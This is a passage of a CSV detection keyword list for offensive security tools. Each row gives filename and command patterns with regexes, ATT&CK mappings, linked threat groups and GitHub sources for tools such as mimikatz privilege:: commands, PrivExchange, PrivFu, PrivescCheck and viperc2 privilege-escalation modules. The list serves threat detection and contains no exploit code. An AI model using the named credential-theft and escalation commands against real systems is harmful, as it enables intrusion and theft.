databases).","T1048 - T1059 - T1088 - T1208","TA0004 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/pentestmonkey/windows-privesc-check","1","1","N/A","N/A","N/A","10","1505","321","2023-08-01T07:35:20Z","2015-03-22T13:39:38Z","55422" "*PrivescCheck.ps1*",".{0,1000}PrivescCheck\.ps1.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","55423" "*PrivescCheck_*.*",".{0,1000}PrivescCheck_.{0,1000}\..{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","55424" "*PrivescCheckAsciiReport*",".{0,1000}PrivescCheckAsciiReport.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","55425" "*PrivEscManager.cs*",".{0,1000}PrivEscManager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","55426" "*privexchange.py -d *",".{0,1000}privexchange\.py\s\-d\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - 
TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","55427" "*privexchange.py*",".{0,1000}privexchange\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55428" "*privexchange.py*",".{0,1000}privexchange\.py.{0,1000}","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","N/A","10","1011","173","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z","55429" "*privexchange.py*",".{0,1000}privexchange\.py.{0,1000}","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","N/A","10","1011","173","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z","55430" "*PrivExchange-master.zip*",".{0,1000}PrivExchange\-master\.zip.{0,1000}","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","N/A","10","1011","173","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z","55431" "*PrivFu\PowerOfTcb*",".{0,1000}PrivFu\\PowerOfTcb.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege 
exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","55432" "*PrivFu-main.zip*",".{0,1000}PrivFu\-main\.zip.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","55433" "*PrivFu-master*",".{0,1000}PrivFu\-master.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","55434" "*PrivFuPipeClient.exe*",".{0,1000}PrivFuPipeClient\.exe.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","55435" "*privilege::backup*",".{0,1000}privilege\:\:backup.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","55436" "*privilege::debug*",".{0,1000}privilege\:\:debug.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - 
OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","55437" "*privilege::debug*",".{0,1000}privilege\:\:debug.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","55438" "*privilege::driver*",".{0,1000}privilege\:\:driver.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known 
to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","55439" "*privilege::id*",".{0,1000}privilege\:\:id.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","55440" "*privilege::name*",".{0,1000}privilege\:\:name.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","55441" "*privilege::restore*",".{0,1000}privilege\:\:restore.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","55442" "*privilege::security*",".{0,1000}privilege\:\:security.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","55443" "*privilege::sysenv*",".{0,1000}privilege\:\:sysenv.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","55444" "*privilege::tcb*",".{0,1000}privilege\:\:tcb.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","55445" "*Privileged Accounts - Layers Analysis.txt*",".{0,1000}Privileged\sAccounts\s\-\sLayers\sAnalysis\.txt.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","55446" "*Privileged Accounts Permissions - Final Report.csv*",".{0,1000}Privileged\sAccounts\sPermissions\s\-\sFinal\sReport\.csv.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","N/A","AD 
Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","55447" "*Privileged Accounts Permissions - Irregular Accounts.csv*",".{0,1000}Privileged\sAccounts\sPermissions\s\-\sIrregular\sAccounts\.csv.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","55448" "*PrivilegeEscalation*",".{0,1000}PrivilegeEscalation.{0,1000}","offensive_tool_keyword","PrivilegeEscalation","This program is a very short batch file which allows you to run anything with admin rights without prompting user could be related to other tools using privsec methods","T1548.001 - T1548.003 - T1548.008","TA0004 - TA0002","N/A","N/A","Exploitation tool","https://github.com/LouisVallat/PrivilegeEscalation","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55449" "*PrivilegeEscalation_BypassUserAccountControl_Windows.py*",".{0,1000}PrivilegeEscalation_BypassUserAccountControl_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55450" "*PrivilegeEscalation_EnumPatchExample_Windows.py*",".{0,1000}PrivilegeEscalation_EnumPatchExample_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the 
tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55451" "*PrivilegeEscalation_ExploitationForPrivilegeEscalation_CVE_2021_40449.py*",".{0,1000}PrivilegeEscalation_ExploitationForPrivilegeEscalation_CVE_2021_40449\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55452" "*PrivilegeEscalation_ExploitationForPrivilegeEscalation_EfsPotato.py*",".{0,1000}PrivilegeEscalation_ExploitationForPrivilegeEscalation_EfsPotato\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55453" 
"*PrivilegeEscalation_ExploitationForPrivilegeEscalation_SweetPotato.py*",".{0,1000}PrivilegeEscalation_ExploitationForPrivilegeEscalation_SweetPotato\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55454" "*PrivilegeEscalation_ExploitationForPrivilegeEscalation_Windows.py*",".{0,1000}PrivilegeEscalation_ExploitationForPrivilegeEscalation_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55455" "*PrivilegeEscalation_ProcessInjection_Getsystem.py*",".{0,1000}PrivilegeEscalation_ProcessInjection_Getsystem\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black 
Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55456" "*Privileger.cpp*",".{0,1000}Privileger\.cpp.{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","N/A","8","2","136","32","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z","55457" "*Privileger.exe*",".{0,1000}Privileger\.exe.{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","N/A","8","2","136","32","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z","55458" "*Privileger-main.*",".{0,1000}Privileger\-main\..{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","N/A","8","2","136","32","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z","55459" "*Privilegerx64.exe*",".{0,1000}Privilegerx64\.exe.{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","N/A","8","2","136","32","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z","55460" "*Privilegerx86.exe*",".{0,1000}Privilegerx86\.exe.{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege 